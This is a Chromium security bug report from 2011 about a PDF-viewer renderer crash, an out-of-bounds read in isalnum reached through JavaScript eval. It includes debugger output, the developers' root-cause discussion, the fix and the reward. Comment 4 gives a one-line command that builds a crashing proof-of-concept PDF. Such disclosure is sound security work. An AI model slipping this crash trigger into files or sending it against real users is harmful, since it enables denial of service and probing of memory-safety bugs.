New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 1 user

Issue metadata

Status: Fixed
Email to this user bounced
Closed: Oct 2011
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

  • Only users with EditIssue permission may comment.

Sign in to add a comment

Renderer crash with PDF at isalnum

Reported by, Oct 2 2011

Issue description

Opening the attached PDF document causes a renderer crash due to invalid read at isalnum with an addresses like 0xffffffff800acf66.

Chrome Version: 14.0.835.186 stable (also beta and dev)
Operating System: Linux, Debian 6.0.2 (32- and 64-bit)

Note: the repro is derived from a malware sample.

 $ google-chrome isalnum.pdf

The repro still has a compressed section of JS, which in the original file contains a large array followed by some deobfuscation code. Based on the crash location I'd guess it happens after decompression while parsing or running the JS, but I haven't yet been able to decompress the stream and have a look at what is happening. The original JS stream does not cause this.

I'll try to minimize the repro further later today.

Type of crash: tab
Crash State: 
Program received signal SIGSEGV, Segmentation fault.
0x00007fffee977773 in isalnum () from /lib/
(gdb) x/3i $rip
=> 0x7fffee977773 <isalnum+19>: movzwl (%rax,%rdi,2),%eax
   0x7fffee977777 <isalnum+23>: and    $0x8,%eax
   0x7fffee97777a <isalnum+26>: retq   
(gdb) i r
rax            0x7ffff466c82c   140737293764652
rbx            0x7fffffffb6e0   140737488336608
rcx            0x9e     158
rdx            0xffffffffffffff80       -128
rsi            0x7fffffffb720   140737488336672
rdi            0xffffffffbe021b9d       -1107158115
rbp            0x7fffffffb720   0x7fffffffb720
rsp            0x7fffffffb338   0x7fffffffb338
r8             0x8      8
r9             0x101010101010101        72340172838076673
r10            0x3900000055     244813135957
r11            0x7fffee9ca42a   140737196631082
r12            0xbe021b9d       3187809181
r13            0x7fffea0b7cbc   140737120009404
r14            0x7fffe6f00b60   140737067879264
r15            0x73     115
rip            0x7fffee977773   0x7fffee977773 <isalnum+19>
eflags         0x10202  [ IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
(gdb) bt 10
#0  0x00007fffee977773 in isalnum () from /lib/
#1  0x00007fffe9efab95 in ?? () from /opt/google/chrome/
#2  0x00007fffe9efb5e9 in ?? () from /opt/google/chrome/
#3  0x00007fffe9ee01c6 in ?? () from /opt/google/chrome/
#4  0x00007fffe9edef83 in ?? () from /opt/google/chrome/
#5  0x00007fffe9edf0a8 in ?? () from /opt/google/chrome/
#6  0x00007fffe9edf188 in ?? () from /opt/google/chrome/
#7  0x00007fffe9edf293 in ?? () from /opt/google/chrome/
#8  0x00007fffe9edf483 in ?? () from /opt/google/chrome/
#9  0x00007fffe9edf5c3 in ?? () from /opt/google/chrome/
(More stack frames follow...)
5.5 KB Download

Comment 1 by, Oct 3 2011

Labels: -Pri-0 -Area-Undefined Pri-1 Area-Internals Feature-PDF SecSeverity-High OS-All Mstone-14
Status: Available
Labels: -Mstone-14 Mstone-15
Status: Assigned
I'll deal with this when I get back (next week). Aki, awesome if you can a minimized repro by then.

Comment 3 by, Oct 10 2011

I some progress. The crash occurs when eval() is given bad data under a few layers of obfuscation. There is a code point 7039 in the argument string, which is somehow different from a visually indistinguishable string constructed with String.fromCharCode. I'll post a better repro a bit later.

Comment 4 by, Oct 10 2011

Got it: 
 $ echo "%PDF 1 0 obj<</Pages 1 0 R /OpenAction 2 0 R>> 2 0 obj<</S /JavaScript /JS (eval(String.fromCharCode(97,99999999)))>> trailer<</Root 1 0 R>>" > repro.pdf;
 $ google-chrome repro.pdf

Crash moves with the high code point.
141 bytes View Download
Nice Aki, thanks! I was planning to tackle this today, too, so good timing.
Labels: -SecSeverity-High SecSeverity-Medium
Status: Started
OOB read due to failure to honor the contract of isalnum:
The c argument is an int, the value of which the application shall ensure is representable as an unsigned char or equal to the value of the macro EOF. If the argument has any other value, the behavior is undefined.

glibc takes the liberty of crashing for its particular view of "undefined", which it is of course permitted to do.
Labels: -Restrict-View-SecurityTeam -Mstone-15 Restrict-View-SecurityNotify Mstone-16 SecImpacts-Stable SecImpacts-Beta reward-topanel
Status: FixUnreleased
Safest to let this one roll into M16, I think.
r1140 on PDF trunk.
Labels: -reward-topanel reward-500 reward-unpaid
@aohelin: interesting bug. It's hard to rule out a bitwise recovery of the OOB content, hence a $500 Chromium Security Reward :D

Boilerplate text:
Please do NOT publicly disclose details until a fix has been released to all our
users. Early public disclosure may cancel the provisional reward.
Also, please be considerate about disclosure when the bug affects a core library
that may be used by other products.
Please do NOT share this information with third parties who are not directly
involved in fixing the bug. Doing so may cancel the provisional reward.
Please be honest if you have already disclosed anything publicly or to third parties.

Comment 10 by, Dec 11 2011

@scarybeasts excellent :)
Labels: -reward-unpaid
Payment in system.

Comment 12 by, May 15 2012

Status: Fixed
Marking old security bugs Fixed..
Project Member

Comment 14 by, Oct 13 2012

Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member

Comment 15 by, Mar 10 2013

Labels: -Type-Security -Area-Internals -Feature-PDF -SecSeverity-Medium -Mstone-16 -SecImpacts-Stable -SecImpacts-Beta Cr-Content-Plugins-PDF Security-Impact-Beta Security-Severity-Medium Cr-Internals Security-Impact-Stable Type-Bug-Security M-16
Project Member

Comment 16 by, Mar 13 2013

Labels: Restrict-View-EditIssue
Project Member

Comment 17 by, Mar 13 2013

Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member

Comment 19 by, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member

Comment 20 by, Mar 21 2013

Labels: -Security-Severity-Medium Security_Severity-Medium
Project Member

Comment 21 by, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member

Comment 22 by, Apr 6 2013

Labels: Cr-Blink
Project Member

Comment 23 by, Apr 6 2013

Labels: -Cr-Content-Plugins-PDF Cr-Internals-Plugins-PDF
Project Member

Comment 24 by, Jun 14 2016

Labels: -security_impact-beta
Project Member

Comment 25 by, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot
Project Member

Comment 26 by, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot
Labels: allpublic

Sign in to add a comment